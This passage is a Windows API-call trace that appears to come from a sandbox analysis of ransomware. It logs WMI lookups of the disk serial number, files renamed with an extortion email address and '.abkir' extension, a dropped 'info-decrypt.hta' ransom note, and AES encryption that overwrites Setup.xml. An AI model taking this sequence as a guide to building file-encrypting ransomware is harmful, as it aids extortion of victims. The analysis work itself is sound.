(in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0151.326] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0151.326] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0151.326] IUnknown:Release (This=0xb51e34) returned 0x1 [0151.327] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x6027330) returned 0x0 [0151.327] WbemLocator:IUnknown:QueryInterface (in: This=0x6027330, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0151.327] WbemLocator:IClassFactory:CreateInstance (in: This=0x6027330, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x6024b00) returned 0x0 [0151.327] WbemLocator:IUnknown:Release (This=0x6027330) returned 0x0 [0151.327] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b00, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x6024b00) returned 0x0 [0151.327] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b00, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0151.327] WbemLocator:IUnknown:AddRef (This=0x6024b00) returned 0x3 [0151.327] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b00, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0151.327] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b00, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0151.327] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b00, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0151.327] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0151.327] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0151.327] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b00, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0151.328] WbemLocator:IUnknown:Release (This=0x6024b00) returned 0x2 [0151.328] WbemLocator:IUnknown:Release (This=0x6024b00) returned 0x1 [0151.328] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0151.328] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0151.328] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b00, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x6024b00) returned 0x0 [0151.328] WbemLocator:IUnknown:AddRef (This=0x6024b00) returned 0x3 [0151.328] WbemLocator:IUnknown:Release (This=0x6024b00) returned 0x2 [0151.328] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025c30, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0151.328] WbemDefPath:IWbemPath:GetText (in: This=0x6025c30, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0151.328] WbemDefPath:IWbemPath:GetText (in: This=0x6025c30, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0151.328] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x6024b10) returned 0x0 [0151.328] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024b10, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x6024594) returned 0x0 [0153.151] WbemLocator:IUnknown:QueryInterface (in: This=0x6024594, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5b5e4) returned 0x0 [0153.151] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b5e4, pProxy=0x6024594, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0153.151] WbemLocator:IUnknown:Release (This=0xb5b5e4) returned 0x1 [0153.151] WbemLocator:IUnknown:QueryInterface (in: This=0x6024594, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5b604) returned 0x0 [0153.151] WbemLocator:IUnknown:QueryInterface (in: This=0x6024594, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5b5e4) returned 0x0 [0153.151] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b5e4, pProxy=0x6024594, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0153.152] WbemLocator:IUnknown:Release (This=0xb5b5e4) returned 0x2 [0153.152] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x1 [0153.152] CoTaskMemFree (pv=0xbd4a38) [0153.152] WbemLocator:IUnknown:Release (This=0x6024b10) returned 0x0 [0153.152] WbemLocator:IUnknown:QueryInterface (in: This=0x6024594, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5b604) returned 0x0 [0153.152] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0153.153] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0153.154] WbemLocator:IUnknown:AddRef (This=0xb5b604) returned 0x3 [0153.154] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0153.155] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0153.160] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5b564) returned 0x0 [0153.160] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b564, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0153.160] WbemLocator:IUnknown:Release (This=0xb5b564) returned 0x3 [0153.160] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0153.160] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0153.160] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5b5ec) returned 0x0 [0153.161] WbemLocator:IRpcOptions:Query (in: This=0xb5b5ec, pPrx=0xb5b604, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0153.161] WbemLocator:IUnknown:Release (This=0xb5b5ec) returned 0x3 [0153.161] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x2 [0153.161] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0153.161] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0153.161] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x6024594) returned 0x0 [0153.161] WbemLocator:IUnknown:AddRef (This=0x6024594) returned 0x4 [0153.161] WbemLocator:IUnknown:Release (This=0x6024594) returned 0x3 [0153.161] WbemLocator:IUnknown:Release (This=0x6024594) returned 0x2 [0153.161] SysStringLen (param_1=0x0) returned 0x0 [0153.161] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025bc0, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0153.161] WbemDefPath:IWbemPath:GetText (in: This=0x6025bc0, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0153.161] WbemDefPath:IWbemPath:GetText (in: This=0x6025bc0, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0153.161] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0153.161] WbemLocator:IUnknown:AddRef (This=0xb5b604) returned 0x3 [0153.161] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5b604) returned 0x0 [0153.161] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x3 [0153.161] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x2 [0153.161] WbemDefPath:IWbemPath:GetText (in: This=0x6025bc0, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0153.161] WbemDefPath:IWbemPath:GetText (in: This=0x6025bc0, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0153.162] IWbemServices:GetObject (in: This=0x6024594, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x6028b10, ppCallResult=0x0) returned 0x0 [0153.820] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025c30, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0153.820] WbemDefPath:IWbemPath:GetText (in: This=0x6025c30, lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0153.820] WbemDefPath:IWbemPath:GetText (in: This=0x6025c30, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0153.820] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36e2ae8*=0, plFlavor=0x36e2aec*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36e2ae8*=8, plFlavor=0x36e2aec*=0) returned 0x0 [0153.820] SysStringByteLen (bstr="9C354B42") returned 0x10 [0153.820] SysStringByteLen (bstr="9C354B42") returned 0x10 [0153.820] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36e2ae8*=8, plFlavor=0x36e2aec*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36e2ae8*=8, plFlavor=0x36e2aec*=0) returned 0x0 [0153.821] SysStringByteLen (bstr="9C354B42") returned 0x10 [0153.821] SysStringByteLen (bstr="9C354B42") returned 0x10 [0153.821] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0153.821] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x6e [0153.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0153.821] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x17d534a0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0153.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0153.821] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0153.823] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0153.823] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0153.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0153.823] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd320fa0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0xd320fa0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0xd36d260, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0153.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0153.823] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0153.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0153.823] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x36e3170 | out: lpFileInformation=0x36e3170*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8)) returned 1 [0153.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0153.824] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0153.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0153.824] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0153.824] GetFileType (hFile=0x2f0) returned 0x1 [0153.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0153.824] GetFileType (hFile=0x2f0) returned 0x1 [0153.824] GetFileSize (in: hFile=0x2f0, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0x8f8 [0153.824] ReadFile (in: hFile=0x2f0, lpBuffer=0x3743c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x3743c50*, lpNumberOfBytesRead=0x6c0f4ec*=0x8f8, lpOverlapped=0x0) returned 1 [0153.827] CloseHandle (hObject=0x2f0) returned 1 [0153.827] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0xbdfae0) returned 1 [0153.828] CryptGenRandom (in: hProv=0xbdfae0, dwLen=0x10, pbBuffer=0x3744fa4 | out: pbBuffer=0x3744fa4) returned 1 [0154.886] CryptImportKey (in: hProv=0xbdfae0, pbData=0x387aa38, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xbe16a8) returned 1 [0154.886] CryptContextAddRef (hProv=0xbdfae0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0154.886] CryptContextAddRef (hProv=0xbdfae0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0154.886] CryptDuplicateKey (in: hKey=0xbe16a8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xbe1468) returned 1 [0154.886] CryptContextAddRef (hProv=0xbdfae0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0154.886] CryptSetKeyParam (hKey=0xbe1468, dwParam=0x4, pbData=0x387ab18*=0x1, dwFlags=0x0) returned 1 [0154.886] CryptSetKeyParam (hKey=0xbe1468, dwParam=0x1, pbData=0x387aae4, dwFlags=0x0) returned 1 [0154.886] CryptEncrypt (in: hKey=0xbe1468, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x387ab28*, pdwDataLen=0x6c0f4b8*=0x900, dwBufLen=0x900 | out: pbData=0x387ab28*, pdwDataLen=0x6c0f4b8*=0x900) returned 1 [0154.886] CryptEncrypt (in: hKey=0xbe1468, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x387b44c*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x387b44c*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0154.888] CryptDestroyKey (hKey=0xbe16a8) returned 1 [0154.888] CryptReleaseContext (hProv=0xbdfae0, dwFlags=0x0) returned 1 [0154.888] CryptReleaseContext (hProv=0xbdfae0, dwFlags=0x0) returned 1 [0154.888] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0154.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0154.888] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x428 [0154.890] GetFileType (hFile=0x428) returned 0x1 [0154.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0154.890] GetFileType (hFile=0x428) returned 0x1 [0154.890] WriteFile (in: hFile=0x428, lpBuffer=0x387ba70*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x387ba70*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 